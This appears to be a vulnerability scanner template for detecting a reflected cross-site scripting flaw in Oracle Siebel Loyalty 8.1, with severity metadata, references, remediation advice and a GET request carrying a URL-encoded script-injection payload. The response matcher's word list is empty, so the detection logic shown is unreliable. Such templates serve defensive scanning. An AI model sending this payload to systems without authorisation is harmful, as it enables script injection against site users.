id: oracle-siebel-xss info: name: Oracle Siebel Loyalty 8.1 - Cross-Site Scripting author: dhiyaneshDK severity: high description: A vulnerability in Oracle Siebel Loyalty allows remote unauthenticated attackers to inject arbitrary Javascript code into the responses returned by the '/loyalty_enu/start.swe/' endpoint. reference: - https://packetstormsecurity.com/files/86721/Oracle-Siebel-Loyalty-8.1-Cross-Site-Scripting.html - https://exploit-db.com/exploits/47762 - https://docs.oracle.com/cd/E95904_01/books/Secur/siebel-security-hardening.html classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N cvss-score: 7.2 cwe-id: CWE-79 remediation: Upgrade to Siebel Loyalty version 8.2 or later. tags: xss,oracle,siebel,packetstorm,edb requests: - method: GET path: - '{{BaseURL}}/loyalty_enu/start.swe/%3E%22%3E%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' matchers-condition: and matchers: - type: word words: - '' - type: word part: header words: - text/html - type: status status: - 200 # Enhanced by mp on 2022/03/30